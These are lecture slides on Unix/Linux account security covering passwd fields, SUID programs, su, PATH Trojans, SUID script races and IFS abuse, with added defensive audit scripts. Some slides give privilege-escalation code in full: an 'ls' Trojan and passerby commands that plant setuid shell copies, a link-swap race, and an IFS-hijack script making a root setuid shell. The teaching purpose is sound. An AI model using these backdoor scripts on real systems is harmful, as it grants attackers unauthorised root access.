The Attack and Defense of Computers Dr. 許 富 皓

Presentation Transcript


  1. The Attack and Defense of Computers Dr. 許 富 皓

  2. Passwords in Unix/Linux Systems

  3. /etc/passwd
     • Format: Rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
     • Fields, in order: account name : encrypted password : uid : gid : user name : home directory : login shell

  4. System Function Account
     • Unix opens special accounts for a variety of system functions (e.g. daemon/sys, ftp, nobody, uucp).
         daemon:*:1:1: :/tmp:
         ftp:*:3:3:FTP User:/usr/spool/ftp:
         nobody:*:60001:60001::/tmp:
         uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico
     • The * in the password field prevents users from using login to log into the system through these accounts (this does not include trusted host/user access; rlogin).

  5. Password Crackers
     • Download (1)
     • Download (2)
     • John the Ripper password cracker -- Linux
     • Ophcrack 2 -- Windows

  6. One Time Password
     • Password list
     • Small Card
     • Calculator

  7. UID, GID, and SUID

  8. Account Name and UID
     • UID 0 → root.
     • A system identifies a user by her/his UID, not her/his name.
     • e.g.
       • Name: root, UID: 100 → no root privilege
       • Name: doggy, UID: 0 → root privilege
     • Good habit: the user name root should be reserved for system administrators.
     • Users with different user names but with the same UID are treated as the same user by the system.
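An audit that follows from these points, as an added example that is not part of the original slides: it reads passwd-format lines and reports names other than root that carry UID 0 and UIDs shared by several names, and goes one step further by reporting empty password fields. The function names, report labels and sample entries (constructed) are assumptions of this example.

```sh
#!/bin/sh
# sample_passwd: constructed passwd-format entries used to exercise the audit.
sample_passwd() {
    cat <<'EOF'
root:*:0:0:Super User:/:/bin/sh
doggy:*:0:0:Constructed entry:/home/doggy:/bin/sh
rachel:*:181:100:Rachel Cohen:/u/rachel:/bin/ksh
guest::182:100:Constructed entry:/tmp:/bin/sh
EOF
}

# audit_passwd [FILE...]: read passwd-format lines (stdin if no FILE) and print
#   UID0 name        a name other than root that carries UID 0
#   SHARED uid a,b   several names mapped to one UID (one user to the system)
#   NOPASS name      empty password field
audit_passwd() {
    awk -F: '
        /^#/ || NF < 7 { next }                 # skip comments and malformed lines
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        $2 == ""                { print "NOPASS " $1 }
        {
            # remember every name seen for this UID, in file order
            if ($3 in names) names[$3] = names[$3] "," $1
            else             names[$3] = $1
            n[$3]++
        }
        END { for (u in n) if (n[u] > 1) print "SHARED " u " " names[u] }
    ' "$@" | LC_ALL=C sort
}
```

Run it as `audit_passwd /etc/passwd`, or `sample_passwd | audit_passwd` to see the three kinds of finding on the constructed entries.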

  9. Real UIDs and Effective UIDs
     • A Unix process has at least these two IDs:
       • Real UID:
         • a process owner's real identity and
         • matches up with the username the owner logged in as.
       • Effective UID:
         • the system decides a process's privilege based on this ID.
     • Usually, the above two IDs of a process are the same.

  10. setuid or SUID program
     • When a SUID program is run, the process involved takes on an effective UID that is the same as the owner of the file.
     • But the real UID remains the same as that of the user who creates the process.
     • chmod 4xxx filename, e.g.
         $ chmod 4757 program_name
         $ ls -al
         ..
         -rwsr-xrwx root user 16384 Sep 3 2005 program_name
       The s in the owner's execute position is the SUID program indicator.

  11. setuid Program examples
     • su
     • passwd

  12. Group
     • Each user belongs to a primary group that is stored in the /etc/passwd file.
     • The /etc/group file contains every group and its gid in a system.
         vision:*:101:Keith,arlin,janice
         users:*:100:
         startrek:*:102:janice,karen,arlin
     • Each user can belong to several different groups, but her/his gid can be the gid of only one of the groups which she/he belongs to.
     • A user can use the command newgrp to change her/his gid.

  13. su: Substitute User
         %whoami
         tim
         %su john
         Password: *******
         %whoami
         john
         ========================================
         %su
         Password: ********     (super user password)
         # whoami               (# is the new prompt)
         root
         #

  14. Security Problem with su
     • Type /bin/su -
       The - causes the sub-shell to read all relevant startup files and simulate a login; therefore, the new shell uses root's environment variables, including PATH.
       1) This avoids a Trojan horse (another program with the same name, placed in one of the directories listed in the PATH variable).
       2) The access rights of the directory that contains the Trojan may not be set correctly.

  15. Stealing Superuser Account
     Assume: root's PATH variable is as follows: .:xxxxxxx
     Observation: when going into a directory, the first command a user types usually is ls.
     A Trojan horse shell script with the name ls:
         %cat ls
         #! /bin/sh
         cp /bin/sh ./stuff/junk/.superdude
         chmod 4555 ./stuff/junk/.superdude
         rm -f $0
         exec /bin/ls ${1+"$@"}
     ====================================
         %cd
         %chmod 700 .
         %touch ./-f
     1) Change the access right of the user's home directory so that the victim must use the root account to see the content of this directory.
     2) Create a file named -f
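A check for the two conditions the last two slides rely on (a current-directory entry in PATH, and a PATH directory whose access rights let anyone write into it), as an added example that is not part of the original slides. The function name and report labels are assumptions of this example.

```sh
#!/bin/sh
# audit_path PATHSTRING
# Prints one finding per risky entry and returns 1 if any was found:
#   EMPTY                 empty entry (leading, trailing or doubled ":"),
#                         which the shell searches as the current directory
#   RELATIVE dir          "." or any entry not starting with "/"
#   WORLD-WRITABLE dir    any user may drop a program into this directory
audit_path() {
    rest=$1:            # trailing ":" so the last entry is consumed like the others
    bad=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}         # first entry
        rest=${rest#*:}         # everything after it
        case $dir in
            '')
                echo "EMPTY (searched as current directory)"; bad=1 ;;
            /*)
                # -L follows symlinks such as /bin -> usr/bin, so the mode shown
                # is the directory's own; character 9 is the "other write" bit.
                case $(ls -ldL -- "$dir" 2>/dev/null) in
                    ????????w*) echo "WORLD-WRITABLE $dir"; bad=1 ;;
                esac ;;
            *)
                echo "RELATIVE $dir"; bad=1 ;;
        esac
    done
    return "$bad"
}
```

Typical use is `audit_path "$PATH"` from the root account's login shell; a clean PATH prints nothing and returns 0.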

  16. Account Steal by Passersby
         $ cp /bin/sh /tmp/break-acct
         $ chmod 4755 /tmp/break-acct
     When a user leaves her/his terminal unattended, a bystander can easily create a backdoor by just typing the above commands.
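A sweep for the artifact both attacks above leave behind (a setuid copy of a shell), as an added example that is not part of the original slides. The function name, the SHELL_LIST override and the default shell list are assumptions of this example.

```sh
#!/bin/sh
# find_suid_shells DIR...
# Lists setuid regular files under DIR... whose content is identical to a shell
# binary, whatever the file is called. File names containing newlines are not
# handled. SHELL_LIST (assumed name) may override the shells compared against.
find_suid_shells() {
    shell_list=${SHELL_LIST:-"/bin/sh /bin/bash /bin/ksh /bin/csh"}
    # -perm -4000: setuid bit set; -xdev: stay on the starting file system
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r file; do
        for shell in $shell_list; do
            # cmp -s compares content silently, so a renamed copy still matches
            if [ -f "$shell" ] && cmp -s "$file" "$shell"; then
                printf 'SUID-SHELL %s (same content as %s)\n' "$file" "$shell"
                break
            fi
        done
    done
}
```

Run it over the places any user can write to, for example `find_suid_shells /tmp /var/tmp /home`.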

  17. Shells and Shell Scripts

  18. Shell
     • Also called a command line interpreter.
     • When you log in to a system, it
       • displays a prompt on the screen and
       • waits for you to enter a command.
     • A running shell is also a process.
     • Some of the famous shells:
       • Bourne shell (/bin/sh)
       • Bourne Again shell (/bin/bash)
       • Korn Shell (/bin/ksh)
       • C-shell (/bin/csh)

  19. Shell Script
     • A shell script is a series of commands written in a plain text file.
     • In order to make a shell script executable, its file permission must be changed to executable.
     • Usually the first line of a shell script is as follows:
       • #! Shell, followed by a series of commands

  20. Security Problems of SUID Shell Script
     • Two shells are involved in the execution of a shell script:
       • the shell that accepts the shell script command;
       • the shell that executes the shell script.
     • Race condition:
         $ cd /tmp
         $ ln /etc/setid_script temp
         $ nice -20 temp &
         $ mv my_script temp      (my_script is the attack script)
       The file is opened twice: between the time the kernel opens the file to see which interpreter to run, and when the (now-set-id) interpreter turns around and reopens the file to interpret it, an attacker might change the file (directly or via symbolic links).

  21. IFS Security

  22. IFS Environment Variable
     • The IFS specifies which characters separate commands.
     • It is normally set to a space, tab, or new line.

  23. IFS and Shell Script Security
     • By changing the IFS, a hacker can change what programs our script executes.
     • Our script calls the /usr/bin/passwd program.
     • Changing the IFS to "/" with % export IFS='/' causes the script to no longer run /usr/bin/passwd, but instead run usr bin passwd.
     • Now a hacker can create a script called usr that generates a root shell.

  24. Security Hole in /usr/lib/preserve
     1. telnet (the user is editing a file with vi)
     2. disconnect
     3. preserve saves the edited file in a restricted area
     4. recover program reads the file from the area

  25. /usr/lib/preserve and /bin/mail
     • preserve was installed SUID root.
     • preserve ran /bin/mail as the root user to alert users that their files had been preserved.
     • preserve executed the mail program with the system() function call, which parses a string into command, options, and arguments according to the content of IFS.

  26. Change IFS to Execute a Different Program/Script
     • If IFS='/', then preserve will execute bin mail instead of /bin/mail.
         % cat bin
         #! /bin/sh
         cd /home/mydir/bin
         cp /bin/sh ./sh
         chown root sh
         chmod 4755 sh
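One way to keep a caller's IFS and PATH away from a helper program, as an added example that is not code from the original slides: a wrapper that runs a program by absolute path with a scrubbed environment, and a preamble that resets both variables inside a script. It assumes env is installed at /usr/bin/env; the function names and the fixed PATH value are choices of this example.

```sh
#!/bin/sh
# run_clean PROGRAM [ARGS...]
# Runs PROGRAM with none of the caller's environment. PROGRAM must be an
# absolute path, so neither PATH search nor word splitting picks the binary.
run_clean() {
    case $1 in
        /*) ;;
        *)  echo "run_clean: refusing non-absolute program: $1" >&2
            return 2 ;;
    esac
    # env -i drops every inherited variable (IFS, PATH, ENV, ...); only the
    # assignments listed here reach the child. "$@" keeps each argument intact.
    /usr/bin/env -i PATH=/usr/bin:/bin "$@"
}

# harden_shell: preamble for a script that may be started with a hostile
# environment. Call it before the first external command.
harden_shell() {
    PATH=/usr/bin:/bin
    export PATH
    # Default IFS is space, tab, newline. The "_" guard keeps the newline from
    # being stripped by command substitution and is removed on the next line.
    IFS=$(printf ' \t\n_')
    IFS=${IFS%_}
    unset ENV BASH_ENV CDPATH
}
```

A C program in the position of preserve gets the same effect by calling execve() with an absolute path and an explicit environment instead of system().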
